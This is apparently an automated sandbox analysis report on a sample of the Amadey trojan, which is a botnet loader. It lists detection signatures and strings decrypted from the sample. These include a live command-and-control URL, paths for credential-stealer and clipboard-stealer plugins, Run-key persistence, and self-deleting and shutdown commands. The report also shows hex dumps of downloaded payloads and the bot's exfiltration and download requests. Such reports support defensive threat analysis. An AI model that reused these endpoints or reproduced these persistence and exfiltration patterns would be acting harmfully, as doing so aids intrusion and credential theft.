Windows Analysis Report
C4v61Eu50U.exe

Overview

General Information

Sample name: C4v61Eu50U.exe (renamed because the original name is a hash value)
Original sample name: 11dcd8e017b0e067e922cfb6507a8dde.exe
Analysis ID: 1427158
MD5: 11dcd8e017b0e067e922cfb6507a8dde
SHA1: 80c4e499c9666401a0f9099482c7fa9debe006d5
SHA256: 2809ff11620a7793560052c4a9c7f2b520b608f3d32c7722133cbeb60e5e9d70
Tags: 32, Amadey, exe, trojan

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection

Source: C4v61Eu50U.exe Avira: detected
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack Malware Configuration Extractor: Amadey {"C2 url": "topgamecheats.dev/j4Fvskd3/index.php", "Version": "4.18"}
Source: topgamecheats.dev Virustotal: Detection: 23%
Source: http://topgamecheats.dev/vidar.exe Virustotal: Detection: 22%
Source: http://topgamecheats.dev/build.dll# Virustotal: Detection: 22%
Source: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll Virustotal: Detection: 22%
Source: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1 Virustotal: Detection: 21%
Source: http://topgamecheats.dev/j4Fvskd3/index.php Virustotal: Detection: 23%
Source: http://topgamecheats.dev/build.dll Virustotal: Detection: 22%
Source: topgamecheats.dev/j4Fvskd3/index.php Virustotal: Detection: 23%
Source: http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll Virustotal: Detection: 11%
Source: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dlly Virustotal: Detection: 20%
Source: http://topgamecheats.dev/j4Fvskd3/index.php: Virustotal: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Virustotal: Detection: 34%
Source: C4v61Eu50U.exe ReversingLabs: Detection: 31%
Source: C4v61Eu50U.exe Virustotal: Detection: 38%
Source: C4v61Eu50U.exe Joe Sandbox ML: detected
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: topgamecheats.dev
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: /j4Fvskd3/index.php
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: S-%lu-
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: 154561dcbf
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Dctooux.exe
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Startup
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: cmd /C RMDIR /s/q
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: rundll32
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Programs
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: %USERPROFILE%
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: cred.dll|clip.dll|
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: http://
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: https://
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: /Plugins/
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: &unit=
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: shell32.dll
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: kernel32.dll
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: GetNativeSystemInfo
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: ProgramData\
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: AVAST Software
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Kaspersky Lab
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Panda Security
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Doctor Web
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: 360TotalSecurity
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Bitdefender
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Norton
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Sophos
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Comodo
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: WinDefender
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: 0123456789
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: ------
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: ?scr=1
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: ComputerName
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: -unicode-
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: VideoID
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: DefaultSettings.XResolution
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: DefaultSettings.YResolution
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: ProductName
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: CurrentBuild
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: rundll32.exe
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: "taskkill /f /im "
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: " && timeout 1 && del
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: && Exit"
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: " && ren
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Powershell.exe
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: shutdown -s -t 0
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: random
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: ~L$v(g
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: ~L$v(g

Compliance

Source: C:\Users\user\Desktop\C4v61Eu50U.exe Unpacked PE file: 0.2.C4v61Eu50U.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 20.2.Dctooux.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 28.2.Dctooux.exe.400000.0.unpack
Source: C4v61Eu50U.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File opened: C:\Windows\SysWOW64\msvcr100.dll

Networking

Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49745 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 93.123.39.96:80 -> 192.168.2.4:49745
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49745 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49752 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49753 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.4:49757 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49758 -> 93.123.39.96:80
Source: Malware configuration extractor URLs: topgamecheats.dev/j4Fvskd3/index.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Mon, 11 Mar 2024 21:14:27 GMTetag: "65ef7433-139e00"accept-ranges: bytescontent-length: 1285632date: Wed, 17 Apr 2024 04:30:14 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 b3 5a e9 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Wed, 17 Apr 2024 03:31:34 GMTetag: "661f4296-4b200"accept-ranges: bytescontent-length: 307712date: Wed, 17 Apr 2024 04:30:17 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7c ff 78 ed 38 9e 16 be 38 9e 16 be 38 9e 16 be 26 cc 83 be 29 9e 16 be 26 cc 95 be 5f 9e 16 be 26 cc 92 be 11 9e 16 be 1f 58 6d be 3b 9e 16 be 38 9e 17 be 56 9e 16 be 26 cc 9c be 39 9e 16 be 26 cc 82 be 39 9e 16 be 26 cc 87 be 39 9e 16 be 52 69 63 68 38 9e 16 be 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0a 97 31 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a4 00 00 00 8c 82 02 00 00 00 00 21 18 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 82 02 00 04 00 00 67 fa 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc bc 03 00 28 00 00 00 00 00 82 02 4e db 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3d a3 00 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6a 05 03 00 00 c0 00 00 00 06 03 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 23 7e 02 00 d0 03 00 00 
28 00 00 00 ae 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 4e db 00 00 00 00 82 02 00 dc 00 00 00 d6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Mon, 11 Mar 2024 21:14:32 GMTetag: "65ef7438-1b600"accept-ranges: bytescontent-length: 112128date: Wed, 17 Apr 2024 04:30:17 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b5 5a e9 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 
69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Wed, 17 Apr 2024 03:40:32 GMTetag: "661f44b0-3ce00"accept-ranges: bytescontent-length: 249344date: Wed, 17 Apr 2024 04:30:23 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1a b3 73 4f 5e d2 1d 1c 5e d2 1d 1c 5e d2 1d 1c 31 a4 83 1c 51 d2 1d 1c 31 a4 b7 1c 16 d2 1d 1c 57 aa 9e 1c 5b d2 1d 1c 57 aa 8e 1c 52 d2 1d 1c de ab 1c 1d 5d d2 1d 1c 5e d2 1c 1c 2c d2 1d 1c 31 a4 b6 1c 75 d2 1d 1c 31 a4 86 1c 5f d2 1d 1c 31 a4 80 1c 5f d2 1d 1c 52 69 63 68 5e d2 1d 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 96 44 1f 66 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0a 00 00 b4 02 00 00 16 01 00 00 00 00 00 90 11 02 00 00 10 00 00 00 d0 02 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 25 00 00 04 00 00 45 a0 04 00 02 00 40 00 c0 17 53 02 58 98 00 00 c0 17 53 02 58 98 00 00 00 00 00 00 10 00 00 00 b0 7e 03 00 42 00 00 00 40 77 03 00 a0 00 00 00 00 b0 24 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 24 00 30 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 01 b3 02 00 00 10 00 00 00 b4 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f2 ae 00 00 00 d0 02 00 00 b0 00 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 2e 21 00 00 80 03 00 00 10 00 00 00 68 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 00 00 00 00 b0 24 00 00 02 00 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 02 52 00 00 00 c0 24 00 00 54 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ODU0MTE= | Host: topgamecheats.dev | Content-Length: 85563 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: topgamecheats.dev | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /j4Fvskd3/Plugins/cred64.dll HTTP/1.1 | Host: topgamecheats.dev
